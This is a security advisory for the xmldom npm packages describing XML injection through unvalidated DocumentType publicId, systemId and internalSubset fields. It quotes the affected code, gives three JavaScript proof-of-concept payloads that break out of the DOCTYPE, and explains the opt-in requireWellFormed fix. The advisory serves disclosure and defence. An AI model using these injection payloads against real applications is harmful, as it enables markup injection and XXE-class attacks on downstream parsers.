GHSA-F6WW-3GGP-FR8H
Vulnerability from github – Published: 2026-04-22 20:19 – Updated: 2026-04-22 20:19
Summary
The package serializes DocumentType node fields (internalSubset, publicId, systemId) verbatim
without any escaping or validation. When these fields are set programmatically to attacker-controlled
strings, XMLSerializer.serializeToString can produce output where the DOCTYPE declaration is
terminated early and arbitrary markup appears outside it.
Details
DOMImplementation.createDocumentType(qualifiedName, publicId, systemId, internalSubset) validates
only qualifiedName against the XML QName production. The remaining three arguments are stored
as-is with no validation.
The XMLSerializer emits DocumentType nodes as:
<!DOCTYPE name[ PUBLIC pubid][ SYSTEM sysid][ [internalSubset]]>
All fields are pushed into the output buffer verbatim — no escaping, no quoting added.
internalSubset injection: The serializer wraps internalSubset with [ and ]. A value
containing ]> closes the internal subset and the DOCTYPE declaration at the injection point.
Any content after ]> in internalSubset appears outside the DOCTYPE in the serialized output as
raw XML markup. Reported by @TharVid (GHSA-f6ww-3ggp-fr8h). Affected: @xmldom/xmldom ≥ 0.9.0
via createDocumentType API; 0.8.x only via direct property write.
publicId injection: The serializer emits publicId verbatim after PUBLIC with no
quoting added. A value containing an injected system identifier (e.g.,
"pubid" SYSTEM "evil") breaks the intended quoting context, injecting a fake SYSTEM entry
into the serialized DOCTYPE declaration. Identified during internal security research. Affected:
both branches, all versions back to 0.1.0.
systemId injection: The serializer emits systemId verbatim. A value containing >
terminates the DOCTYPE declaration early; content after > appears as raw XML markup outside
the DOCTYPE context. Identified during internal security research. Affected: both branches, all
versions back to 0.1.0.
The parse path is safe: the SAX parser enforces the PubidLiteral and SystemLiteral grammar
productions, which exclude the relevant characters, and the internal subset parser only accepts a
subset it can structurally validate. The vulnerability is reachable only through programmatic
construction: createDocumentType calls, or direct writes to a DocumentType node's publicId,
systemId, or internalSubset properties, with attacker-controlled values.
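Because the serializer adds no quoting of its own, the caller has to supply systemId as a complete quoted literal. One application-side way to do that for untrusted input is sketched below. This is an assumption-laden illustration, not part of the package: toSystemLiteral is a hypothetical helper name, and it relies only on the XML 1.0 SystemLiteral production [11], which allows any character except the enclosing quote.

```javascript
// Hypothetical helper (not part of @xmldom/xmldom): wrap an untrusted string
// as an XML 1.0 SystemLiteral by choosing a quote character that the value
// does not contain. Values containing both quote characters are rejected.
function toSystemLiteral(value) {
  const text = String(value);
  if (!text.includes('"')) {
    return '"' + text + '"';
  }
  if (!text.includes("'")) {
    return "'" + text + "'";
  }
  throw new RangeError('value contains both quote characters and cannot be a SystemLiteral');
}

// An ordinary identifier is wrapped in double quotes.
const plainLiteral = toSystemLiteral('http://example.com/root.dtd');

// The systemId payload from this advisory contains double quotes, so it is
// wrapped in single quotes; its ">" then stays inside the literal.
const wrappedPayload = toSystemLiteral('"sysid"><injected attr="pwn"/>');

console.log(plainLiteral);
console.log(wrappedPayload);
```

The result would be passed as the systemId argument of createDocumentType. A helper like this only addresses systemId; publicId has a narrower character set and internalSubset has no equivalent quoting.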
Affected code
lib/dom.js — createDocumentType (lines 898–910):
createDocumentType: function (qualifiedName, publicId, systemId, internalSubset) {
  validateQualifiedName(qualifiedName); // only qualifiedName is validated
  var node = new DocumentType(PDC);
  node.name = qualifiedName;
  node.nodeName = qualifiedName;
  node.publicId = publicId || ''; // stored verbatim
  node.systemId = systemId || ''; // stored verbatim
  node.internalSubset = internalSubset || ''; // stored verbatim
  node.childNodes = new NodeList();
  return node;
},
lib/dom.js — serializer DOCTYPE case (lines 2948–2964):
case DOCUMENT_TYPE_NODE:
  var pubid = node.publicId;
  var sysid = node.systemId;
  buf.push(g.DOCTYPE_DECL_START, ' ', node.name);
  if (pubid) {
    buf.push(' ', g.PUBLIC, ' ', pubid);
    if (sysid && sysid !== '.') {
      buf.push(' ', sysid);
    }
  } else if (sysid && sysid !== '.') {
    buf.push(' ', g.SYSTEM, ' ', sysid);
  }
  if (node.internalSubset) {
    buf.push(' [', node.internalSubset, ']'); // internalSubset emitted verbatim
  }
  buf.push('>');
  return;
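The effect of this branch can be reproduced without the package by modeling it as a standalone function. The sketch below is a simplified stand-in, not the library's code: serializeDoctype is a hypothetical name, and the g.DOCTYPE_DECL_START, g.PUBLIC, and g.SYSTEM constants are assumed to be the literal strings `<!DOCTYPE`, `PUBLIC`, and `SYSTEM`.

```javascript
// Simplified model of the serializer's DOCUMENT_TYPE_NODE branch.
// Assumption: the g.* constants are the literal strings used below.
function serializeDoctype(node) {
  const buf = ['<!DOCTYPE', ' ', node.name];
  const pubid = node.publicId;
  const sysid = node.systemId;
  if (pubid) {
    buf.push(' ', 'PUBLIC', ' ', pubid);
    if (sysid && sysid !== '.') {
      buf.push(' ', sysid);
    }
  } else if (sysid && sysid !== '.') {
    buf.push(' ', 'SYSTEM', ' ', sysid);
  }
  if (node.internalSubset) {
    buf.push(' [', node.internalSubset, ']');
  }
  buf.push('>');
  return buf.join('');
}

// A well-formed quoted literal serializes as intended.
const benignDoctype = serializeDoctype({
  name: 'root', publicId: '', systemId: '"root.dtd"', internalSubset: '',
});

// A systemId containing ">" ends the declaration at the injection point.
const hostileDoctype = serializeDoctype({
  name: 'root', publicId: '', systemId: '"sysid"><injected attr="pwn"/>', internalSubset: '',
});

console.log(benignDoctype);  // <!DOCTYPE root SYSTEM "root.dtd">
console.log(hostileDoctype); // <!DOCTYPE root SYSTEM "sysid"><injected attr="pwn"/>>
```

Nothing in the function inspects the field contents, so any delimiter in the input becomes a delimiter in the output.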
PoC
internalSubset injection
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const doctype = impl.createDocumentType(
  'root',
  '',
  '',
  ']><injected/><![CDATA['
);
const doc = impl.createDocument(null, 'root', doctype);
const xml = new XMLSerializer().serializeToString(doc);
console.log(xml);
// <!DOCTYPE root []><injected/><![CDATA[]><root/>
//                   ^^^^^^^^^^^ injected element outside DOCTYPE
publicId quoting context break
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const doctype = impl.createDocumentType(
  'root',
  '"injected PUBLIC_ID" SYSTEM "evil"',
  '',
  ''
);
const doc = impl.createDocument(null, 'root', doctype);
console.log(new XMLSerializer().serializeToString(doc));
// <!DOCTYPE root PUBLIC "injected PUBLIC_ID" SYSTEM "evil"><root/>
// quoting context broken: SYSTEM entry injected
systemId injection
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const doctype = impl.createDocumentType(
  'root',
  '',
  '"sysid"><injected attr="pwn"/>',
  ''
);
const doc = impl.createDocument(null, 'root', doctype);
console.log(new XMLSerializer().serializeToString(doc));
// <!DOCTYPE root SYSTEM "sysid"><injected attr="pwn"/>><root/>
// > in sysid closes DOCTYPE early; <injected/> appears as sibling element
Impact
An application that programmatically constructs DocumentType nodes from user-controlled data and
then serializes the document can emit a DOCTYPE declaration where the internal subset is closed
early or where injected SYSTEM entities or other declarations appear in the serialized output.
Downstream XML parsers that re-parse the serialized output and expand entities from the injected DOCTYPE declarations may be susceptible to XXE-class attacks if they enable entity expansion.
Fix Applied
⚠ Opt-in required. Protection is not automatic. Existing serialization calls remain vulnerable unless
{ requireWellFormed: true } is explicitly passed. Applications that pass untrusted data to createDocumentType() or write untrusted values directly to a DocumentType node's publicId, systemId, or internalSubset properties should audit all serializeToString() call sites and add the option.
XMLSerializer.serializeToString() now accepts an options object as a second argument. When { requireWellFormed: true } is passed, the serializer validates the DocumentType node's publicId, systemId, and internalSubset fields before emitting the DOCTYPE declaration and throws InvalidStateError if any field contains an injection sequence:
- publicId: throws if non-empty and does not match the XML PubidLiteral production (XML 1.0 [12])
- systemId: throws if non-empty and does not match the XML SystemLiteral production (XML 1.0 [11])
- internalSubset: throws if it contains ]> (which closes the internal subset and DOCTYPE declaration early)
All three checks apply regardless of how the invalid value entered the node — whether via createDocumentType arguments or a subsequent direct property write.
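The three checks can be approximated outside the library, for example to reject bad input before it reaches a DocumentType node. The following is a rough sketch under stated assumptions: the regular expressions are transcribed from XML 1.0 productions [11] to [13], findDoctypeProblem is a hypothetical name, and the package's actual implementation and error messages may differ.

```javascript
// XML 1.0 [13] PubidChar: space, CR, LF, ASCII letters and digits, and -'()+,./:=?;!*#@$_%
// XML 1.0 [12] PubidLiteral: '"' PubidChar* '"' | "'" (PubidChar - "'")* "'"
const PUBID_LITERAL =
  /^(?:"[\x20\r\na-zA-Z0-9\-'()+,.\/:=?;!*#@$_%]*"|'[\x20\r\na-zA-Z0-9\-()+,.\/:=?;!*#@$_%]*')$/;

// XML 1.0 [11] SystemLiteral: ('"' [^"]* '"') | ("'" [^']* "'")
const SYSTEM_LITERAL = /^(?:"[^"]*"|'[^']*')$/;

// Hypothetical check: returns a description of the first problem found,
// or null when all three fields pass. Empty fields are accepted.
function findDoctypeProblem(doctype) {
  if (doctype.publicId && !PUBID_LITERAL.test(doctype.publicId)) {
    return 'publicId is not a valid PubidLiteral';
  }
  if (doctype.systemId && !SYSTEM_LITERAL.test(doctype.systemId)) {
    return 'systemId is not a valid SystemLiteral';
  }
  if (doctype.internalSubset && doctype.internalSubset.includes(']>')) {
    return 'internalSubset contains "]>"';
  }
  return null;
}

// The publicId payload from this advisory fails the PubidLiteral check.
const pubidProblem = findDoctypeProblem({
  publicId: '"injected PUBLIC_ID" SYSTEM "evil"', systemId: '', internalSubset: '',
});

// A conventional public/system identifier pair passes.
const noProblem = findDoctypeProblem({
  publicId: '"-//W3C//DTD XHTML 1.0 Strict//EN"',
  systemId: '"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"',
  internalSubset: '',
});

console.log(pubidProblem);
console.log(noProblem);
```

Note that the literals are checked with their surrounding quotes, because the serializer emits the stored value verbatim and adds no quoting.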
PoC — fixed path
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();

// internalSubset injection
const dt1 = impl.createDocumentType('root', '', '', ']><injected/><![CDATA[');
const doc1 = impl.createDocument(null, 'root', dt1);

// Default (unchanged): verbatim, injection present
console.log(new XMLSerializer().serializeToString(doc1));
// <!DOCTYPE root []><injected/><![CDATA[]><root/>

// Opt-in guard: throws InvalidStateError
try {
  new XMLSerializer().serializeToString(doc1, { requireWellFormed: true });
} catch (e) {
  console.log(e.name, e.message);
  // InvalidStateError: DocumentType internalSubset contains "]>"
}
The guard also covers post-creation property writes:
const dt2 = impl.createDocumentType('root', '', '');
dt2.systemId = '"sysid"><injected attr="pwn"/>';
const doc2 = impl.createDocument(null, 'root', dt2);
new XMLSerializer().serializeToString(doc2, { requireWellFormed: true });
// InvalidStateError: DocumentType systemId is not a valid SystemLiteral
Why the default stays verbatim
The W3C DOM Parsing and Serialization spec §3.2.1.3 defines a require well-formed flag whose default value is false. With the flag unset, the spec permits verbatim serialization of DOCTYPE fields. Unconditionally throwing would be a behavioral breaking change with no spec justification. The opt-in requireWellFormed: true flag allows applications that require injection safety to enable strict mode without breaking existing deployments.
Residual limitation
createDocumentType(qualifiedName, publicId, systemId[, internalSubset]) still does not validate publicId, systemId, or internalSubset at creation time. Adding creation-time validation would be a breaking change, so it is deferred to a future breaking release.
When the default serialization path is used (without requireWellFormed: true), all three fields are still emitted verbatim. Applications that do not pass requireWellFormed: true remain exposed.
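Since protection depends on every call site passing the option, one way to reduce the chance of a missed call is to route serialization through a single helper. A minimal sketch, assuming the two-argument serializeToString(node, options) form described above; makeStrictSerializer is a hypothetical name, and the serializer constructor is passed in as a parameter so the helper does not assume how the package is loaded.

```javascript
// Hypothetical helper: returns a function that always serializes with
// requireWellFormed: true, so individual call sites cannot omit the option.
// Any error thrown by the serializer propagates to the caller.
function makeStrictSerializer(SerializerCtor) {
  return function serializeStrict(node) {
    return new SerializerCtor().serializeToString(node, { requireWellFormed: true });
  };
}
```

With the real package, the argument would presumably be the XMLSerializer export of @xmldom/xmldom at a version that includes the fix; on older versions the option would have no effect.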
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@xmldom/xmldom"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.8.13"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "@xmldom/xmldom"
},
"ranges": [
{
"events": [
{
"introduced": "0.9.0"
},
{
"fixed": "0.9.10"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "xmldom"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.6.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-41674"
],
"database_specific": {
"cwe_ids": [
"CWE-91"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-22T20:19:12Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "## Summary\n\nThe package serializes `DocumentType` node fields (`internalSubset`, `publicId`, `systemId`) verbatim\nwithout any escaping or validation. When these fields are set programmatically to attacker-controlled\nstrings, `XMLSerializer.serializeToString` can produce output where the DOCTYPE declaration is\nterminated early and arbitrary markup appears outside it.\n\n---\n\n## Details\n\n`DOMImplementation.createDocumentType(qualifiedName, publicId, systemId, internalSubset)` validates\nonly `qualifiedName` against the XML QName production. The remaining three arguments are stored\nas-is with no validation.\n\nThe XMLSerializer emits `DocumentType` nodes as:\n\n```\n\u003c!DOCTYPE name[ PUBLIC pubid][ SYSTEM sysid][ [internalSubset]]\u003e\n```\n\nAll fields are pushed into the output buffer verbatim \u2014 no escaping, no quoting added.\n\n**`internalSubset` injection:** The serializer wraps `internalSubset` with ` [` and `]`. A value\ncontaining `]\u003e` closes the internal subset and the DOCTYPE declaration at the injection point.\nAny content after `]\u003e` in `internalSubset` appears outside the DOCTYPE in the serialized output as\nraw XML markup. Reported by @TharVid (GHSA-f6ww-3ggp-fr8h). Affected: `@xmldom/xmldom` \u2265 0.9.0\nvia `createDocumentType` API; 0.8.x only via direct property write.\n\n**`publicId` injection:** The serializer emits `publicId` verbatim after `PUBLIC` with no\nquoting added. A value containing an injected system identifier (e.g.,\n`\"pubid\" SYSTEM \"evil\"`) breaks the intended quoting context, injecting a fake SYSTEM entry\ninto the serialized DOCTYPE declaration. Identified during internal security research. Affected:\nboth branches, all versions back to 0.1.0.\n\n**`systemId` injection:** The serializer emits `systemId` verbatim. A value containing `\u003e`\nterminates the DOCTYPE declaration early; content after `\u003e` appears as raw XML markup outside\nthe DOCTYPE context. 
Identified during internal security research. Affected: both branches, all\nversions back to 0.1.0.\n\nThe parse path is safe: the SAX parser enforces the `PubidLiteral` and `SystemLiteral` grammar\nproductions, which exclude the relevant characters, and the internal subset parser only accepts a\nsubset it can structurally validate. The vulnerability is reachable only through programmatic\n`createDocumentType` calls with attacker-controlled arguments.\n\n---\n\n## Affected code\n\n**`lib/dom.js` \u2014 `createDocumentType` (lines 898\u2013910):**\n\n```js\ncreateDocumentType: function (qualifiedName, publicId, systemId, internalSubset) {\n validateQualifiedName(qualifiedName); // only qualifiedName is validated\n var node = new DocumentType(PDC);\n node.name = qualifiedName;\n node.nodeName = qualifiedName;\n node.publicId = publicId || \u0027\u0027; // stored verbatim\n node.systemId = systemId || \u0027\u0027; // stored verbatim\n node.internalSubset = internalSubset || \u0027\u0027; // stored verbatim\n node.childNodes = new NodeList();\n return node;\n},\n```\n\n**`lib/dom.js` \u2014 serializer DOCTYPE case (lines 2948\u20132964):**\n\n```js\ncase DOCUMENT_TYPE_NODE:\n var pubid = node.publicId;\n var sysid = node.systemId;\n buf.push(g.DOCTYPE_DECL_START, \u0027 \u0027, node.name);\n if (pubid) {\n buf.push(\u0027 \u0027, g.PUBLIC, \u0027 \u0027, pubid);\n if (sysid \u0026\u0026 sysid !== \u0027.\u0027) {\n buf.push(\u0027 \u0027, sysid);\n }\n } else if (sysid \u0026\u0026 sysid !== \u0027.\u0027) {\n buf.push(\u0027 \u0027, g.SYSTEM, \u0027 \u0027, sysid);\n }\n if (node.internalSubset) {\n buf.push(\u0027 [\u0027, node.internalSubset, \u0027]\u0027); // internalSubset emitted verbatim\n }\n buf.push(\u0027\u003e\u0027);\n return;\n```\n\n---\n\n## PoC\n\n### internalSubset injection\n\n```js\nconst { DOMImplementation, XMLSerializer } = require(\u0027@xmldom/xmldom\u0027);\n\nconst impl = new DOMImplementation();\nconst doctype = impl.createDocumentType(\n 
\u0027root\u0027,\n \u0027\u0027,\n \u0027\u0027,\n \u0027]\u003e\u003cinjected/\u003e\u003c![CDATA[\u0027\n);\nconst doc = impl.createDocument(null, \u0027root\u0027, doctype);\nconst xml = new XMLSerializer().serializeToString(doc);\nconsole.log(xml);\n// \u003c!DOCTYPE root []\u003e\u003cinjected/\u003e\u003c![CDATA[]\u003e\u003croot/\u003e\n// ^^^^^^^^^^ injected element outside DOCTYPE\n```\n\n### publicId quoting context break\n\n```js\nconst { DOMImplementation, XMLSerializer } = require(\u0027@xmldom/xmldom\u0027);\n\nconst impl = new DOMImplementation();\nconst doctype = impl.createDocumentType(\n \u0027root\u0027,\n \u0027\"injected PUBLIC_ID\" SYSTEM \"evil\"\u0027,\n \u0027\u0027,\n \u0027\u0027\n);\nconst doc = impl.createDocument(null, \u0027root\u0027, doctype);\nconsole.log(new XMLSerializer().serializeToString(doc));\n// \u003c!DOCTYPE root PUBLIC \"injected PUBLIC_ID\" SYSTEM \"evil\"\u003e\u003croot/\u003e\n// quoting context broken \u2014 SYSTEM entry injected\n```\n\n### systemId injection\n\n```js\nconst { DOMImplementation, XMLSerializer } = require(\u0027@xmldom/xmldom\u0027);\n\nconst impl = new DOMImplementation();\nconst doctype = impl.createDocumentType(\n \u0027root\u0027,\n \u0027\u0027,\n \u0027\"sysid\"\u003e\u003cinjected attr=\"pwn\"/\u003e\u0027,\n \u0027\u0027\n);\nconst doc = impl.createDocument(null, \u0027root\u0027, doctype);\nconsole.log(new XMLSerializer().serializeToString(doc));\n// \u003c!DOCTYPE root SYSTEM \"sysid\"\u003e\u003cinjected attr=\"pwn\"/\u003e\u003e\u003croot/\u003e\n// \u003e in sysid closes DOCTYPE early; \u003cinjected/\u003e appears as sibling element\n```\n\n---\n\n## Impact\n\nAn application that programmatically constructs `DocumentType` nodes from user-controlled data and\nthen serializes the document can emit a DOCTYPE declaration where the internal subset is closed\nearly or where injected SYSTEM entities or other declarations appear in the serialized output.\n\nDownstream XML parsers that 
re-parse the serialized output and expand entities from the injected\nDOCTYPE declarations may be susceptible to XXE-class attacks if they enable entity expansion.\n\n---\n\n## Fix Applied\n\n\u003e **\u26a0 Opt-in required.** Protection is not automatic. Existing serialization calls remain\n\u003e vulnerable unless `{ requireWellFormed: true }` is explicitly passed. Applications that pass\n\u003e untrusted data to `createDocumentType()` or write untrusted values directly to a\n\u003e `DocumentType` node\u0027s `publicId`, `systemId`, or `internalSubset` properties should audit\n\u003e all `serializeToString()` call sites and add the option.\n\n`XMLSerializer.serializeToString()` now accepts an options object as a second argument. When `{ requireWellFormed: true }` is passed, the serializer validates the `DocumentType` node\u0027s `publicId`, `systemId`, and `internalSubset` fields before emitting the DOCTYPE declaration and throws `InvalidStateError` if any field contains an injection sequence:\n\n- **`publicId`**: throws if non-empty and does not match the XML `PubidLiteral` production (XML 1.0 [12])\n- **`systemId`**: throws if non-empty and does not match the XML `SystemLiteral` production (XML 1.0 [11])\n- **`internalSubset`**: throws if it contains `]\u003e` (which closes the internal subset and DOCTYPE declaration early)\n\nAll three checks apply regardless of how the invalid value entered the node \u2014 whether via `createDocumentType` arguments or a subsequent direct property write.\n\n### PoC \u2014 fixed path\n\n```js\nconst { DOMImplementation, XMLSerializer } = require(\u0027@xmldom/xmldom\u0027);\nconst impl = new DOMImplementation();\n\n// internalSubset injection\nconst dt1 = impl.createDocumentType(\u0027root\u0027, \u0027\u0027, \u0027\u0027, \u0027]\u003e\u003cinjected/\u003e\u003c![CDATA[\u0027);\nconst doc1 = impl.createDocument(null, \u0027root\u0027, dt1);\n\n// Default (unchanged): verbatim \u2014 injection present\nconsole.log(new 
XMLSerializer().serializeToString(doc1));\n// \u003c!DOCTYPE root []\u003e\u003cinjected/\u003e\u003c![CDATA[]\u003e\u003croot/\u003e\n\n// Opt-in guard: throws InvalidStateError\ntry {\n new XMLSerializer().serializeToString(doc1, { requireWellFormed: true });\n} catch (e) {\n console.log(e.name, e.message);\n // InvalidStateError: DocumentType internalSubset contains \"]\u003e\"\n}\n```\n\nThe guard also covers post-creation property writes:\n\n```js\nconst dt2 = impl.createDocumentType(\u0027root\u0027, \u0027\u0027, \u0027\u0027);\ndt2.systemId = \u0027\"sysid\"\u003e\u003cinjected attr=\"pwn\"/\u003e\u0027;\nconst doc2 = impl.createDocument(null, \u0027root\u0027, dt2);\nnew XMLSerializer().serializeToString(doc2, { requireWellFormed: true });\n// InvalidStateError: DocumentType systemId is not a valid SystemLiteral\n```\n\n### Why the default stays verbatim\n\nThe W3C DOM Parsing and Serialization spec \u00a73.2.1.3 defines a `require well-formed` flag whose **default value is `false`**. With the flag unset, the spec permits verbatim serialization of DOCTYPE fields. Unconditionally throwing would be a behavioral breaking change with no spec justification. The opt-in `requireWellFormed: true` flag allows applications that require injection safety to enable strict mode without breaking existing deployments.\n\n### Residual limitation\n\n`createDocumentType(qualifiedName, publicId, systemId[, internalSubset])` does not validate `publicId`, `systemId`, or `internalSubset` at creation time. This creation-time validation is a breaking change and is deferred to a future breaking release.\n\nWhen the default serialization path is used (without `requireWellFormed: true`), all three fields are still emitted verbatim. Applications that do not pass `requireWellFormed: true` remain exposed.",
"id": "GHSA-f6ww-3ggp-fr8h",
"modified": "2026-04-22T20:19:12Z",
"published": "2026-04-22T20:19:12Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/xmldom/xmldom/security/advisories/GHSA-f6ww-3ggp-fr8h"
},
{
"type": "WEB",
"url": "https://github.com/xmldom/xmldom/commit/372008f9ae0e20fd69f761c7b79e202598267314"
},
{
"type": "PACKAGE",
"url": "https://github.com/xmldom/xmldom"
},
{
"type": "WEB",
"url": "https://github.com/xmldom/xmldom/releases/tag/0.8.13"
},
{
"type": "WEB",
"url": "https://github.com/xmldom/xmldom/releases/tag/0.9.10"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "xmldom has XML injection through unvalidated DocumentType serialization"
}